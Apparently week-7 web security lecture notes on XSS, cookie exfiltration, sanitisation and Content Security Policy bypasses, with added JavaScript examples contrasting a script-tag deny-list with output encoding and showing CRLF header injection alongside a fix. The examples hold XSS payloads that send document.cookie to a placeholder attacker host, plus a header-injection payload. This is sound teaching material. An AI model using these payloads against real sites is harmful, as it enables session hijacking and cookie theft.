week 7

  • JS/HTML injection
  • Exfiltrating cookies
  • JS/HTML sanitisation
  • Content Security Policy
  • CSP bypasses
    • Guessable or reused nonces (derived from a timestamp or counter, or the same value on every response) instead of fresh CSPRNG output on each page load.
    • Being able to upload content to an allowlisted origin, including 'self': a file uploaded to and served from that origin is a permitted script source.
    • Injecting \r\n\r\n into a response header: the browser treats the first blank line as the end of the header block, so every header after it (potentially the CSP!) is pushed into the response body and never applied.
    • Vulnerabilities in libraries the page legitimately loads, or in other libraries hosted on an allowlisted origin (a whole CDN, say) that the CSP permits even though the page does not use them (script gadgets).
    • Injecting a <base> tag to change the document's base URI, so that the page's own relative script URLs (ones the policy trusts, e.g. nonced scripts) resolve to an attacker-controlled host; prevented by a base-uri directive.
    • Injecting markup that breaks or replaces a <meta http-equiv> tag carrying the CSP; a policy delivered in the body only takes effect from the point it is parsed, unlike one sent as a response header.
  • SOP will be covered next week
  • Report 1, midterm, Topic 4 intro challenges to be demoed (depending on timing)
    • bigapp, sign in,
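Added example for the injection, cookie-exfiltration and sanitisation items above (not the lecture's own code, and not from bigapp): a deny-list "sanitiser" that only strips <script> tags, beside context-aware output encoding, each rendered into a constructed profile template and fed two payloads that ship document.cookie to a made-up host. Payloads, template and hostname are all assumptions made for the example.

```javascript
// Added example for the JS/HTML injection, cookie exfiltration and sanitisation
// topics. Not the lecture's own code; payloads and hostnames are constructed.

// Deny-list "sanitiser": removes <script>...</script> only. This is the approach
// that fails, because script can run from attributes and other elements.
function stripScriptTags(untrusted) {
  return String(untrusted).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Output encoding: replace every character that can change parser state in the
// HTML text and double-quoted attribute contexts. The browser decodes these back
// to literal characters, so the payload is displayed rather than parsed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Template with two injection points: an attribute value and element text.
// `encode` is whichever treatment the caller applies to untrusted data.
function renderProfile(name, bio, encode) {
  return `<input name="display" value="${encode(name)}">` +
         `<p class="bio">${encode(bio)}</p>`;
}

// The template itself contains exactly three tags: <input>, <p>, </p>.
// Any further '<' in the output came from untrusted input.
function countTags(html) {
  return (html.match(/</g) || []).length;
}

// Constructed attacker input. Neither contains a <script> tag, yet both execute
// JavaScript: the first breaks out of the attribute value, the second uses an
// event handler on an inline SVG. Both send document.cookie to a hypothetical
// attacker host, which is why session cookies should also be HttpOnly.
const NAME_PAYLOAD = '"><img src=x onerror="location=\'https://attacker.example/c?\'+document.cookie">';
const BIO_PAYLOAD  = '<svg onload="fetch(\'https://attacker.example/c?\'+document.cookie)">';

function compare() {
  const denyList = renderProfile(NAME_PAYLOAD, BIO_PAYLOAD, stripScriptTags);
  const encoded  = renderProfile(NAME_PAYLOAD, BIO_PAYLOAD, escapeHtml);
  return {
    denyListTags: countTags(denyList),          // 5: template tags plus <img> and <svg>
    encodedTags:  countTags(encoded),           // 3: only the template's own tags
    denyListHasImg: denyList.includes('<img'),  // true
    encodedHasImg:  encoded.includes('<img'),   // false: it is now &lt;img
  };
}

console.log(compare());
```

The point of the attribute payload is that stripping one tag name does nothing about the quote that closes the attribute; encoding the quote is what keeps the data inside the context the template put it in.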

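Added example for the \r\n\r\n header-injection bypass above (not the lecture's code): a server that copies an untrusted redirect target into a Location header, a parser that splits the raw response the way a browser does (headers end at the first blank line), and the check that stops the injection. The redirect target, the payload and the page body are constructed for the example.

```javascript
// Added example for the CRLF-injection CSP bypass. Not the lecture's own code;
// the response, the payload and the URLs are constructed.

const CRLF = '\r\n';

// Vulnerable: an untrusted value goes straight into a header line, ahead of the CSP.
function buildResponseUnsafe(redirectTarget) {
  const headers = [
    'HTTP/1.1 302 Found',
    `Location: ${redirectTarget}`,
    "Content-Security-Policy: default-src 'self'",
    'Content-Type: text/html',
  ];
  return headers.join(CRLF) + CRLF + CRLF + '<html><body>Redirecting...</body></html>';
}

// Hardened: refuse any header value containing CR or LF. Modern servers do this
// for you (Node's http module rejects such values), so this only matters where
// code assembles raw responses itself.
function assertHeaderValue(value) {
  if (/[\r\n]/.test(value)) throw new Error('CR/LF not allowed in a header value');
  return value;
}
function buildResponseSafe(redirectTarget) {
  return buildResponseUnsafe(assertHeaderValue(redirectTarget));
}

// Minimal response parser with the browser's rule: everything before the first
// blank line is headers, everything after it is body.
function parseResponse(raw) {
  const split = raw.indexOf(CRLF + CRLF);
  const head = raw.slice(0, split).split(CRLF);
  const body = raw.slice(split + 4);
  const headers = {};
  for (const line of head.slice(1)) {
    const i = line.indexOf(':');
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { status: head[0], headers, body };
}

// Constructed attacker input: a redirect target that ends the header block and
// starts a body of the attacker's choosing.
const PAYLOAD = 'https://example.com/' + CRLF + CRLF + '<script>alert(document.cookie)</script>';

function demonstrate() {
  const hijacked = parseResponse(buildResponseUnsafe(PAYLOAD));
  return {
    cspApplied: 'content-security-policy' in hijacked.headers,         // false
    bodyStartsWithScript: hijacked.body.startsWith('<script>'),        // true
    cspInBody: hijacked.body.includes('Content-Security-Policy'),      // true
  };
}

console.log(demonstrate());
```

Everything the server wrote after the injected blank line, the CSP header included, is just text in the body, so the attacker's script runs under no policy at all.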
`<scri